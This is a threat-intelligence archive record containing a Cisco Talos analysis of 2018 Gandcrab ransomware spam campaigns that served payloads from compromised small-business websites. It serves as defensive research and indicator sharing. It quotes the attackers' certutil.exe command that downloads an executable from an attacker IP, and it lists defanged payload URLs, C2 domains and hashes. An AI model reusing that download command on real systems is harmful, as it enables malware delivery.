{
	"id": "c8911d09-3a0c-4251-92f7-5d7f4ae61cc2",
	"created_at": "2026-04-06T00:13:48.989824Z",
	"updated_at": "2026-04-10T13:12:51.935401Z",
	"deleted_at": null,
	"sha1_hash": "6a3a5a755f99bda83397d5d69ea138161fa52ab9",
	"title": "Gandcrab Ransomware Walks its Way onto Compromised Sites",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1042577,
	"plain_text": "Gandcrab Ransomware Walks its Way onto Compromised Sites\r\nBy Nick Biasini\r\nPublished: 2018-05-09 · Archived: 2026-04-05 14:14:02 UTC\r\nWednesday, May 9, 2018 11:40\r\nThis blog post authored by Nick Biasini with contributions from Nick Lister and Christopher Marczewski.\r\nDespite the recent decline in the prevalence of ransomware in the threat landscape, Cisco Talos has been\r\nmonitoring the now widely distributed ransomware called Gandcrab. Gandcrab uses both traditional spam\r\ncampaigns, as well as multiple exploit kits, including Rig and Grandsoft. While we've seen cryptocurrency miners\r\novertake ransomware as the most popular malware on the threat landscape, Gandcrab is proof that ransomware\r\ncan still strike at any time.\r\nWhile investigating a recent spam campaign Talos found a series of compromised websites that were being used to\r\ndeliver Gandcrab. This malware is the latest in a long line of examples of why stopping malware distribution is a\r\nproblem, and shows why securing websites is both an arduous and necessary task. As a clear example of how\r\nchallenging resolving these issues can be, one of the sites — despite being shut down briefly — was seen serving\r\nGandcrab not once, but twice, over a few days.\r\nThe first campaign Beginning on April 30, 2018, Talos began observing a large-scale spam\r\ncampaign that disguised itself as an online order. The subject used during this campaign was\r\n\"Your Order #{Random Digits}\" (i.e. Your Order #99627). A sample of the email can be seen\r\nbelow.\r\nhttps://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nPage 1 of 8\n\nYou can see above that there is a limited body and an attached ZIP file. The attached ZIP file contains a Word\r\ndocument. This Word document contains a macro that downloads and executes the Gandcrab ransomware. In this\r\nparticular instance, the malware was being downloaded from the path below:\r\nhxxp://185.189.58[.]222/bam.exe\r\nDuring the course of the campaign, we also saw emails that included VBScript files instead of a ZIP file. The end\r\nresult is the same, with the payload being pulled off of the server. One of the interesting aspects to this malware is\r\nthe system tools used to download the payload. There are lots of different ways that the payload can be\r\ndownloaded using macros, but this particular campaign used a somewhat novel approach of leveraging\r\ncertutil.exe. Certutil.exe is a command line utility that is installed as part of Certificate Services. This campaign\r\nleveraged it to allow for the downloading of a malicious payload. The specific syntax used is shown below:\r\ncertutil.exe -urlcache -split -f hxxp://185.189.58[.]222/bam.exe\r\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\FVAacW.exe\r\nThe -urlcache flag is designed to be used to display or delete URL-cached entries. However, by leveraging the -f\r\nand -split flags, the adversaries are able to force the URL to be downloaded to the location shown above. We have\r\nseen this technique used periodically by attackers, but it isn't commonly utilized. The file is then executed, and\r\nGandcrab is installed on the target system.\r\nhttps://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nPage 2 of 8\n\nSame campaign, different location A couple days after the initial wave of this campaign, a second\r\none started up. Beginning on May 2, Talos observed another wave of emails that were using an\r\nalmost identical campaign. The subjects, bodies, and attachments were almost identical. There\r\nwas one subtle change: the location the payload was being hosted. Initially, it appeared to be\r\nanother random host as the get request to retrieve the malware is shown below:\r\nhxxp://172.104.40[.]92/js/kukul.exe\r\nWe began investigating this a little further, and found when looking at DNS that this was in fact an actual\r\nlegitimate website (www[.]pushpakcourier[.]net) and validated it by successfully downloading the payload from\r\nhxxp://www[.]pushpakcourier[.]net/js/kukul.exe. The website itself appears to be a courier company based out of\r\nIndia.\r\nhttps://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nPage 3 of 8\n\nWe were able to quickly determine that the website was running phpMyAdmin. We began looking a little deeper\r\nat what possible vulnerabilities could exist, and we ran into a large amount, including default credentials and\r\nmultiple MySQL vulnerabilities that could be leveraged. Shortly after this was discovered, the website was taken\r\ndown. Talos also attempted to directly reach out to the owners to help aid them in identifying where the threat\r\noriginated from and the scope of the downloads.\r\nThis incident helps shed more light onto one of the biggest challenges we face: compromised websites. There are\r\na huge amount of web pages available on the internet, and many of them are running on antiquated software. Most\r\nsmall businesses aren't aware that a new vulnerability has been released against a web framework and even if they\r\ndid, most lack the expertise and time to be able to frequently update the software that the companies' websites rely\r\nupon.\r\nAdversaries, on the other hand, are able to quickly leverage these vulnerabilities and begin widely scanning the\r\ninternet looking for potential victims. Leveraging these compromised sites in these types of spam campaigns is\r\nincreasingly effective because adversaries don't need to maintain persistence, or do much of anything other than\r\ncopying a file to a specific location that they can point to systems, allowing for infection.\r\nAnother day, more lazy spammers Shortly after the previous two campaigns, we spotted a third\r\n— again using the same basic subject, body and attachment types. This time, they ditched the IPs\r\nand started pulling the malware from another likely compromised site using the domain this time.\r\nhxxp://herbal-treatment-advisory[.]com/c.exe\r\nThis particular site appears to be a Wordpress site, which has a plethora of vulnerabilities against it that could be\r\nleveraged. A little further digging revealed that they were running a version of Wordpress that was more than a\r\nyear out of date. Additionally, Talos found that this particular site had been leveraged in the past to serve\r\nGandcrab. This is yet another example of how compromised websites will continue to be leveraged to serve\r\nhttps://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nPage 4 of 8\n\nmalware. This allows adversaries to save time and money, doing things like registering domains, buying VPS, and\r\nconfiguring a web server to host the files. The added advantage is that they also get to leverage the web reputation\r\nof the site they compromise, which could help bypass some blocklisting technologies, at least initially.\r\nIn both cases, these websites are using older versions of software and have publicly exposed the admin pages for\r\nthe web frameworks they are utilizing. These are both common things that website admins miss when they are\r\nsetting up a small company site. Ensuring that the administrative pages are protected and the software is patched is\r\nparamount to preventing adversaries from gaining access to serve malware.\r\nSame site, different campaign On May 5 and 7, Talos saw another set of spam campaigns\r\nlaunched using this same template again. These particular spammers are not putting much effort\r\ninto making the campaigns unique. Over the course of several days, we repeatedly saw the same\r\nbasic email with the malware being hosted in different locations. These campaigns are no\r\nexception, except the websites aren't new. As shown below, the adversaries have returned to the\r\nsame sites they were leveraging just days earlier. This is despite the fact that the websites were\r\ntaken down, likely due to malware being hosted.\r\nhxxp://pushpakcourier[.]net/css/c.exe\r\nhxxp://herbal-treatment-advisory[.]com/c.exe\r\nOver the course of a week, we saw four different spam campaigns leveraging compromised websites, and in some\r\ncases returning to the same sites, despite attempted cleaning. This is a clear example of the challenges that face\r\nsmall businesses while trying to support a website for their organizations. Adversaries are quick to identify both\r\nvulnerabilities and exposed admin pages to leverage to distribute malware around the world.\r\nhttps://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nPage 5 of 8\n\nPayload Gandcrab is one of the most widely distributed ransomware variants today. It is under\r\nalmost constant development, with its creators releasing new versions at an aggressive pace. Its\r\nbasic functionality has been well documented. It does the typical things ransomware does,\r\nincluding encrypting files with the .CRAB extension, changing the user's background, and\r\nleveraging Tor for communication.\r\nOne of the interesting elements of Gandcrab is its use of namecoin domains for command and control (C2)\r\ncommunication. These are easily identified by the .bit top level domain (TLD). Increasingly, adversaries rely on\r\nTor and namecoin domains to help evade identification. Namecoin is a decentralized DNS service that does not\r\nrely on a central authority instead of relying on a peer-to-peer network. This increases the difficulty associated\r\nwith getting domains shut down and identifying those that are potentially behind them.\r\nNamecoin domains provide another example of why DNS should be locked down in enterprise environments.\r\nSince namecoin relies on blockchain to provide authoritative responses, standard DNS servers are typically not\r\neffective at serving .bit domains. If an enterprise blocks all unauthorized DNS server access, most .bit domains\r\nwill be blocked. We have already started to see proxy services similar to tor2web start to emerge for .bit TLDs.\r\nConclusion With billions of dollars at stakes in the ransomware field, threats like Gandcrab are\r\ngoing to continue to emerge time and time again. There are millions and millions of web pages\r\nrunning on platforms that have thousands of vulnerabilities. Since most of these pages are created\r\nand maintained by small organizations that don't have the knowledge or resources to react to\r\nemerging vulnerabilities, this will continue to be a problem for the foreseeable future. As long as\r\nadversaries are able to hide their malware on legitimate sites, web reputation systems are going to\r\nbe compromised.\r\nThe other thing we can learn from Gandcrab is that ransomware isn't going anywhere, even with the rise in the\r\npopularity of cryptocurrency miners. Adversaries are always going to follow money, whether its ransomware or\r\nmalicious crypto miners, the bad guys are always looking to make a quick dollar. Some of the biggest challenges\r\nwe face as a security community is the leveraging of compromised websites to distribute malware.\r\nCoverage\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nPage 6 of 8\n\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors.\r\nCWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated\r\nwith this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOC Email Subject:\r\nYour Order #{Random Digits}\r\nGandcrab Hashes:\r\n6a623b1e016fc0df94fe27a3eb9cc1128c5ee3831a7dcc8e4879427167a41501\r\n692c023850bbd95f116d5a623a5e0de9ad0ad13fadb3d89e584cc0aa5dc71f08\r\nad48c3770736588b17b4af2599704b5c86ff8ae6dadd30df59ea2b1ccc221f9c\r\n3486088d40d41b251017b4b6d21e742c78be820eaa8fe5d44eee79cf5974477e\r\n521fcb199a36d2c3b3bac40b025c2deac472f7f6f46c2eef253132e9f42ed95d\r\n9ba87c3c9ac737b5fd5fc0270f902fbe2eabbb1e0d0db64c3a07fea2eeeb5ba6\r\n27431cce6163d4456214baacbc9fd163d9e7e16348f41761bac13b65e3947aad\r\nce9c9917b66815ec7e5009f8bfa19ef3d2dfc0cf66be0b4b99b9bebb244d6706\r\n0b8618ea4aea0b213278a41436bde306a71ca9ba9bb9e6f0d33aca1c4373b3b5\r\n07adce515b7c2d6132713b32f0e28999e262832b47abc26ffc58297053f83257\r\nhttps://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nPage 7 of 8\n\n0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e\r\n812a7387e6728f462b213ff0f6ccc3c74aff8c258748e4635e1ddfa3b45927f0\r\nd25d1aba05f4a66a90811c31c6f4101267151e4ec49a7f393e53d87499d5ea7a\r\nee24d0d69b4e6c6ad479c886bb0536e60725bfa0becdafecadafc10e7a231a55\r\nC2 Domains:\r\nzonealarm[.]bit\r\nRansomware[.]bit\r\ngandcrab[.]bit\r\nCarder[.]bit\r\nCompromised Domains:\r\nHerbal-treatment-advisory[.]com\r\npushpakcourier[.]net\r\nSource: https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nhttps://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html"
	],
	"report_names": [
		"gandcrab-compromised-sites.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434428,
	"ts_updated_at": 1775826771,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6a3a5a755f99bda83397d5d69ea138161fa52ab9.pdf",
		"text": "https://archive.orkl.eu/6a3a5a755f99bda83397d5d69ea138161fa52ab9.txt",
		"img": "https://archive.orkl.eu/6a3a5a755f99bda83397d5d69ea138161fa52ab9.jpg"
	}
}